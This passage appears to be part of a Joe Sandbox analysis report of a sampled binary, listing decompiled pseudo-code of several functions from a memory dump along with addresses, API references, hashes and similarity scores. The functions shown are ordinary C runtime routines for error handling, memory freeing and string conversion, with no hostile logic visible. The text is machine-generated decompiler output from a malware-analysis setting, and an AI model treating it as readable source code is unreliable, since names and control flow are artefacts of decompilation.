				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E01378BD0(_t107, E013798EF(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E01378BD0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x14a59b4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x1394134();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E013824F9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x13a2188);
									E013786F0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E0137B351(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E0137C057(_t103, _t108[0x18], E013798EF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E0137C067(_t103, _t108[0x18], E013798EF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E013798EF();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x0137b351
0x0137b353
0x0137b358
0x0137b35d
0x0137b35f
0x0137b362
0x0137b367
0x0137b477
0x0137b477
0x0137b477
0x00000000
0x0137b376
0x0137b376
0x0137b37b
0x0137b385
0x0137b387
0x0137b38c
0x0137b391
0x0137b391
0x0137b393
0x0137b396
0x0137b39b
0x0137b3bd
0x0137b3bd
0x0137b3c0
0x0137b3c3
0x0137b3e1
0x0137b3e4
0x0137b423
0x0137b426
0x0137b429
0x0137b44e
0x0137b450
0x00000000
0x0137b452
0x0137b452
0x0137b454
0x00000000
0x0137b456
0x0137b456
0x0137b45b
0x0137b45f
0x0137b45f
0x0137b460
0x00000000
0x0137b460
0x0137b454
0x0137b42b
0x0137b42b
0x0137b42d
0x00000000
0x0137b42f
0x0137b42f
0x0137b431
0x00000000
0x0137b433
0x0137b444
0x00000000
0x0137b449
0x0137b431
0x0137b42d
0x0137b3e6
0x0137b3e6
0x0137b3ea
0x00000000
0x0137b3f0
0x0137b3f0
0x0137b3f2
0x00000000
0x0137b3f8
0x0137b3ff
0x0137b407
0x0137b40b
0x0137b40d
0x0137b410
0x0137b415
0x0137b416
0x00000000
0x0137b416
0x0137b410
0x00000000
0x0137b40b
0x0137b3f2
0x0137b3ea
0x0137b3c5
0x0137b3c5
0x00000000
0x0137b3c5
0x0137b3a2
0x0137b3a2
0x0137b3a7
0x0137b3ac
0x00000000
0x0137b3ae
0x0137b3b0
0x0137b3b9
0x0137b3c8
0x0137b3ca
0x0137b489
0x0137b489
0x0137b48e
0x0137b48f
0x0137b491
0x0137b496
0x0137b49b
0x0137b49e
0x0137b4a1
0x0137b4a4
0x0137b4ad
0x0137b4ad
0x0137b4a6
0x0137b4a6
0x0137b4a6
0x0137b4b0
0x0137b4b4
0x0137b4b7
0x0137b4b8
0x0137b4b9
0x0137b4ba
0x0137b4bd
0x0137b4c6
0x0137b4c6
0x0137b4c9
0x0137b4ff
0x0137b4cb
0x0137b4cb
0x0137b4cb
0x0137b4ce
0x0137b4e5
0x0137b4e5
0x0137b4ce
0x0137b504
0x0137b50e
0x0137b51a
0x0137b3d8
0x0137b3d8
0x0137b3dd
0x0137b3de
0x0137b418
0x0137b41f
0x0137b463
0x0137b463
0x0137b46a
0x0137b479
0x0137b47c
0x0137b488
0x0137b488
0x0137b3ca
0x0137b3ac
0x00000000
0x00000000
0x00000000
0x0137b37b

APIs

___AdjustPointer.LIBCMT ref: 0137B418
___AdjustPointer.LIBCMT ref: 0137B43B
___AdjustPointer.LIBCMT ref: 0137B4D7

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 195ff314a5673fc4bbf8a1c2dfc8438891cb56746a966b0d8c3f31d810224ac8
Instruction ID: 9409f32d01b6bc14e02109c996aaee9b69c05f07252c600627b0ddb2ddd826f2
Opcode Fuzzy Hash: 195ff314a5673fc4bbf8a1c2dfc8438891cb56746a966b0d8c3f31d810224ac8
Instruction Fuzzy Hash: 8351B072600606EFEB399F58D844B7AFBB4EF4021CF14452DED0166699D739E880DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0137185F Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0137185F(void* __ebx, void* __edx, void* __eflags, short* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				char _v12;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short* _v36;
				signed int _v48;
				char _v60;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t26;
				intOrPtr _t27;
				void* _t30;
				void* _t33;
				void* _t40;
				void* _t43;
				intOrPtr _t45;
				short* _t46;
				void* _t47;
				intOrPtr _t48;
				void* _t49;
				void* _t51;
				void* _t59;
				void* _t60;
				intOrPtr _t61;
				signed int _t62;
				short* _t64;
				void* _t65;
				void* _t67;
				void* _t68;
				signed int _t69;
				void* _t71;
				short* _t73;
				intOrPtr _t77;
				void* _t78;
				signed int _t79;

				_t59 = __edx;
				_t79 = _t78 - 0x28;
				_t23 =  *0x13a3014; // 0x98b2b77b
				_v4 = _t23 ^ _t79;
				asm("xorps xmm0, xmm0");
				_push(__ebx);
				_t73 = _a4;
				_v36 = _t73;
				_v32 = _a12;
				asm("movlpd [esp+0x28], xmm0");
				_t26 = E0137FC20(_t73);
				_t49 = _t60;
				_t27 = _t26 + 1;
				_t45 = _t73;
				_v28 = _t27;
				_t61 = _t27;
				_t67 = 0;
				if(_t27 != 0) {
					_t77 = _v32;
					while(1) {
						_t43 = E01375981(_t49,  &_v24, _t45, _t61,  &_v20, _t77);
						_t79 = _t79 + 0x14;
						if(_t43 <= 0) {
							break;
						}
						_t45 = _t45 + _t43;
						_t67 = _t67 + 1;
						_t61 = _t61 - _t43;
						if(_t61 != 0) {
							continue;
						}
						break;
					}
					_t73 = _v36;
				}
				_t68 = _t67 + 1;
				_push(2);
				_t46 = E0137C583();
				_v36 = _t46;
				_t51 = _t68;
				if(_t46 == 0) {
					E01375E7D(__eflags);
					asm("int3");
					_push(_t73);
					_push(_t61);
					_t62 = _v48;
					__eflags = _t62;
					if(_t62 != 0) {
						__eflags =  *_t62;
						if(__eflags == 0) {
							_push(_t68);
							_t69 = E01377F22(_t68, __eflags, 0x44);
							_t33 = E013716B9(_t46,  &_v60, _t62, _t69, E01371807(_a8));
							_t20 = _t69 + 4;
							 *_t20 =  *(_t69 + 4) & 0x00000000;
							__eflags =  *_t20;
							 *_t69 = 0x1394300;
							E013719B2(_t69, _t33);
							 *_t62 = _t69;
							E01371711( &_v60, _t62, _t69);
						}
					}
					_t30 = 2;
					return _t30;
				} else {
					asm("xorps xmm0, xmm0");
					_t64 = _t46;
					asm("movlpd [esp+0x2c], xmm0");
					if(_t68 != 0) {
						_t48 = _v28;
						while(1) {
							_t40 = E01375981(_t51, _t64, _t73, _t48,  &_v12, _v32);
							_t79 = _t79 + 0x14;
							if(_t40 <= 0) {
								break;
							}
							_t73 = _t73 + _t40;
							_t64 = _t64 + 2;
							_t68 = _t68 - 1;
							if(_t68 != 0) {
								continue;
							}
							break;
						}
						_t46 = _v36;
					}
					 *_t64 = 0;
					_pop(_t65);
					_pop(_t71);
					_pop(_t47);
					return E01377F14(_t46, _t47, _v4 ^ _t79, _t59, _t65, _t71);
				}
			}

0x0137185f
0x0137185f
0x01371862
0x01371869
0x01371871
0x01371874
0x01371876
0x0137187d
0x01371881
0x01371885
0x0137188b
0x01371890
0x01371891
0x01371894
0x01371898
0x0137189c
0x0137189e
0x0137189f
0x013718a1
0x013718a5
0x013718b2
0x013718b7
0x013718bc
0x00000000
0x00000000
0x013718be
0x013718c0
0x013718c1
0x013718c3
0x00000000
0x00000000
0x00000000
0x013718c3
0x013718c5
0x013718c5
0x013718c9
0x013718ca
0x013718d2
0x013718d4
0x013718d9
0x013718dc
0x01371931
0x01371936
0x01371937
0x0137193d
0x0137193e
0x01371941
0x01371943
0x01371945
0x01371948
0x0137194a
0x01371956
0x01371961
0x01371966
0x01371966
0x01371966
0x0137196d
0x01371973
0x0137197b
0x0137197d
0x01371982
0x01371948
0x01371985
0x01371988
0x013718de
0x013718de
0x013718e1
0x013718e3
0x013718eb
0x013718ed
0x013718f1
0x013718fd
0x01371902
0x01371907
0x00000000
0x00000000
0x01371909
0x0137190b
0x0137190e
0x01371911
0x00000000
0x00000000
0x00000000
0x01371911
0x01371913
0x01371913
0x0137191d
0x01371922
0x01371923
0x01371925
0x01371930
0x01371930

APIs

_strlen.LIBCMT ref: 0137188B
Concurrency::cancel_current_task.LIBCPMT ref: 01371931
ctype.LIBCPMT ref: 01371973
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0137197D

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Concurrency::cancel_current_taskLocinfoLocinfo::~__strlenctypestd::_
String ID:
API String ID: 2131814884-0
Opcode ID: bc38c45fd34f6b16b801336da11f6eb899fcff2adcd490aa93be6071127ab4b0
Instruction ID: ac38fc7506b9b738647b4018eacaa9462f3ba605b35ba13aad65705e6d5b474e
Opcode Fuzzy Hash: bc38c45fd34f6b16b801336da11f6eb899fcff2adcd490aa93be6071127ab4b0
Instruction Fuzzy Hash: D031F573A04306AFD320EF6DD880B6FBBE8EFA9628F000929F94493241F634D9458791

Uniqueness

Uniqueness Score: -1.00%

Function 0138C54D Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0138C54D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E0138C142(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E0138C142(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0137FCEE(GetLastError());
									_t19 =  *((intOrPtr*)(E0137FD24(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E0138CB13(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0137FCEE(GetLastError());
						return  *((intOrPtr*)(E0137FD24(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E0138CB13(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E013827D8(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x0138c554
0x0138c559
0x0138c577
0x0138c579
0x0138c57c
0x0138c5a9
0x0138c5b1
0x0138c5b3
0x0138c5cc
0x0138c5cf
0x0138c5d2
0x0138c5e0
0x0138c5ef
0x0138c5f7
0x0138c5f9
0x0138c612
0x0138c615
0x0138c615
0x0138c5fb
0x0138c602
0x0138c60d
0x0138c60d
0x0138c617
0x00000000
0x0138c617
0x0138c5d7
0x0138c5dc
0x0138c5de
0x00000000
0x00000000
0x00000000
0x0138c5de
0x0138c5bc
0x00000000
0x0138c5c7
0x0138c57e
0x0138c581
0x0138c584
0x0138c597
0x0138c59a
0x0138c56d
0x0138c56d
0x00000000
0x0138c570
0x0138c58a
0x0138c58f
0x0138c591
0x0138c61b
0x0138c61b
0x00000000
0x0138c591
0x0138c55b
0x0138c560
0x0138c565
0x0138c567
0x0138c56a
0x00000000

APIs

Part of subcall function 013827D8: _free.LIBCMT ref: 013827E6

Part of subcall function 0138C142: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,01387EF6,?,00000000,00000000), ref: 0138C1EE

GetLastError.KERNEL32 ref: 0138C5B5
__dosmaperr.LIBCMT ref: 0138C5BC
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0138C5FB
__dosmaperr.LIBCMT ref: 0138C602

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 580b838d3a1e71fb8032a1a8cb05b094f84b9bf9da6c15f20d6736c7a6d1c0d4
Instruction ID: 451dab0e409b35b18268640557cc4e728dc8fd0d8a2f359f21cdd54141f83c70
Opcode Fuzzy Hash: 580b838d3a1e71fb8032a1a8cb05b094f84b9bf9da6c15f20d6736c7a6d1c0d4
Instruction Fuzzy Hash: 6021D37160070AAFDF21BF6ADC808ABB7ADFF042BC7045529E86597540D731ED4087B0

Uniqueness

Uniqueness Score: -1.00%

Function 01385D71 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E01385D71(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x13a31a0; // 0x2
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0138846A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E013858A2(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0138846A(__eflags,  *0x13a31a0, _t51);
							if(__eflags != 0) {
								E01385B9F(_t51, 0x14a5d34);
								E013871B2(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0138846A(__eflags,  *0x13a31a0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0138846A(0,  *0x13a31a0, 0);
							_push(0);
							L9:
							E013871B2();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E0138842B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x13a31a0; // 0x2
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E013824F9(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x13a31a0; // 0x2
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0138846A(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E013858A2(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0138846A(__eflags,  *0x13a31a0, _t60);
								if(__eflags != 0) {
									E01385B9F(_t60, 0x14a5d34);
									E013871B2(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0138846A(__eflags,  *0x13a31a0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0138846A(__eflags,  *0x13a31a0, _t20);
								_push(_t60);
								L25:
								E013871B2();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E0138842B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x13a31a0; // 0x2
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E013824F9(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x13a31a0; // 0x2
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0138846A(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E013858A2(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0138846A(__eflags,  *0x13a31a0, _t54);
											if(__eflags != 0) {
												E01385B9F(_t54, 0x14a5d34);
												E013871B2(0);
												goto L45;
											} else {
												_t40 = 0;
												E0138846A(__eflags,  *0x13a31a0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0138846A(0,  *0x13a31a0, 0);
											_push(0);
											L41:
											E013871B2();
											goto L36;
										}
									}
								} else {
									_t54 = E0138842B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x13a31a0; // 0x2
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x01385d71
0x01385d71
0x01385d7c
0x01385d7e
0x01385d83
0x01385d86
0x01385da4
0x01385da7
0x01385dac
0x01385dae
0x00000000
0x01385db0
0x01385dbc
0x01385dbf
0x01385dc0
0x01385dc2
0x01385de7
0x01385de9
0x01385e02
0x01385e09
0x01385e0e
0x00000000
0x01385deb
0x01385deb
0x01385df4
0x01385df9
0x00000000
0x01385df9
0x01385dc4
0x01385dc4
0x01385dc4
0x01385dcd
0x01385dd2
0x01385dd3
0x01385dd3
0x01385dd8
0x00000000
0x01385dd8
0x01385dc2
0x01385d88
0x01385d8e
0x01385d92
0x01385d9f
0x00000000
0x01385d94
0x01385d97
0x01385e11
0x01385e11
0x01385d99
0x01385d99
0x01385d99
0x01385d9b
0x01385d9b
0x01385d9b
0x01385d97
0x01385d92
0x01385e14
0x01385e1c
0x01385e1e
0x01385e20
0x01385e28
0x01385e2d
0x01385e2e
0x01385e33
0x01385e34
0x01385e37
0x01385e51
0x01385e54
0x01385e59
0x01385e5b
0x00000000
0x01385e5d
0x01385e69
0x01385e6c
0x01385e6d
0x01385e6f
0x01385e92
0x01385e94
0x01385eab
0x01385eb2
0x01385eb7
0x00000000
0x01385e96
0x01385e9d
0x01385ea2
0x00000000
0x01385ea2
0x01385e71
0x01385e78
0x01385e7d
0x01385e7e
0x01385e7e
0x01385e83
0x00000000
0x01385e83
0x01385e6f
0x01385e39
0x01385e3f
0x01385e41
0x01385e43
0x01385e4c
0x00000000
0x01385e45
0x01385e45
0x01385e48
0x01385ec2
0x01385ec2
0x01385ec7
0x01385eca
0x01385ecb
0x01385ecc
0x01385ed3
0x01385ed5
0x01385eda
0x01385edd
0x01385efb
0x01385efe
0x01385f03
0x01385f05
0x00000000
0x01385f07
0x01385f13
0x01385f17
0x01385f19
0x01385f3e
0x01385f40
0x01385f59
0x01385f60
0x00000000
0x01385f42
0x01385f42
0x01385f4b
0x01385f50
0x00000000
0x01385f50
0x01385f1b
0x01385f1b
0x01385f1b
0x01385f24
0x01385f29
0x01385f2a
0x01385f2a
0x00000000
0x01385f2f
0x01385f19
0x01385edf
0x01385ee5
0x01385ee7
0x01385ee9
0x01385ef6
0x00000000
0x01385eeb
0x01385eeb
0x01385eee
0x01385f68
0x01385f68
0x01385ef0
0x01385ef0
0x01385ef0
0x01385ef0
0x01385ef2
0x01385ef2
0x01385ef2
0x01385eee
0x01385ee9
0x01385f6b
0x01385f73
0x01385f75
0x01385f75
0x01385f7c
0x01385e4a
0x01385eba
0x01385eba
0x01385ebc
0x00000000
0x01385ebe
0x01385ec1
0x01385ec1
0x01385ebc
0x01385e48
0x01385e43
0x01385e22
0x01385e27
0x01385e27

APIs

GetLastError.KERNEL32(?,00000000,?,0137D1A2,00000000,00000000,?,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385D76
_free.LIBCMT ref: 01385DD3
_free.LIBCMT ref: 01385E09
SetLastError.KERNEL32(00000000,00000002,000000FF,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385E14

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 14f02037d1e6c4f1ae6d0a335328e05c65ad4603f41738897d9591431c198eaf
Instruction ID: 58b191b13913f378266733419eacfcd958745812705e2c7efb98f4bf96b460a4
Opcode Fuzzy Hash: 14f02037d1e6c4f1ae6d0a335328e05c65ad4603f41738897d9591431c198eaf
Instruction Fuzzy Hash: 0511A9336047026FF6227B7CAD88D2B756EABD177EBB50628FA15971D0DF6188068220

Uniqueness

Uniqueness Score: -1.00%

Function 01385EC8 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E01385EC8(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x13a31a0; // 0x2
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0138846A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E013858A2(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0138846A(__eflags,  *0x13a31a0, _t18);
							if(__eflags != 0) {
								E01385B9F(_t18, 0x14a5d34);
								E013871B2(0);
								goto L13;
							} else {
								_t13 = 0;
								E0138846A(__eflags,  *0x13a31a0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0138846A(0,  *0x13a31a0, 0);
							_push(0);
							L9:
							E013871B2();
							goto L4;
						}
					}
				} else {
					_t18 = E0138842B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x13a31a0; // 0x2
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x01385ed3
0x01385ed5
0x01385eda
0x01385edd
0x01385efb
0x01385efe
0x01385f03
0x01385f05
0x00000000
0x01385f07
0x01385f13
0x01385f17
0x01385f19
0x01385f3e
0x01385f40
0x01385f59
0x01385f60
0x00000000
0x01385f42
0x01385f42
0x01385f4b
0x01385f50
0x00000000
0x01385f50
0x01385f1b
0x01385f1b
0x01385f1b
0x01385f24
0x01385f29
0x01385f2a
0x01385f2a
0x00000000
0x01385f2f
0x01385f19
